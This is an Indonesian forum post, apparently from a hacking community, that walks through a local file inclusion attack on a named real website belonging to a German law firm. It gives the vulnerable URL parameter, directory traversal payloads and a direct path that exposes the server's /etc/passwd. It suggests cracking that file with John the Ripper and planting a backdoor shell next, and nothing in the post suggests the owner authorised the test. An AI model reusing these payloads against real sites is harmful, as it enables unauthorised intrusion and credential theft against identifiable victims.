[koecroet]

setelah lama gk bikin tread ane malam ini mau bikin tread atas nama penasaran dan kesalahan ane karna ada yg menanyakan apakah website ini vulnerable atau tidak. dan ternyata ada dan ane sudah sampai di /etc/passwd walau belum sempat untuk menanam backdoor dikarenakan di butuhkan perabaan file lagi dan besok hari ane UAS fisika dan Ipa wkwkwkwk

oke deh ane lupa tadi yg nannya om siapa yg jelas ini special untuk ente

Code:

bug nya terletak disini:
http://www.rechtsanwalt-bohle.de/index.php?tarcont=

Code:

kalo dikasih
http://www.rechtsanwalt-bohle.de/index.php?tarcont=./../../../../../etc/passwd

muncul error kan?? , tapi belom muncul isi file dari /etc/passwd. eits sebelum itu jangan2 ada yg belom tau lagi macem isi dari /etc/passwd gimana . coba buka dulu di backtrack ente,

Code:

cat /etc/passwd

itu akan muncul isi dari file /etc/passwd yang nantinya bisa di crack dengan JTR bin John The Ripper

okeh lanjut error tersebut bisa dikatakan bug terdapat, tapi belom ketemu /etc/passwd nya, hmm sekarang coba kita mundur dengan

Code:

../../../

coba kita langsung ke /etc/passwd

Code:

www.rechtsanwalt-bohle.de/index.php?tarcont=/etc/passwd

tada!!
muncul deh isi /etc/passwd walaupun harus di exploit lanjut buat tanam shell nya.

disini ane hanya menunjukan ke peserta training tadi kalo web ini ada bug lfi nya

thank u

curcol dikit, ane lagi keingetan mantan :|

mohon maaf kalo tutorial nya cupu abis, apa lagi buat yg udah dewi bin dewo banget *sungkem* *tendang* *kaburr*

ane masih jauh dari kata pentester apa lagi hacker,

salam..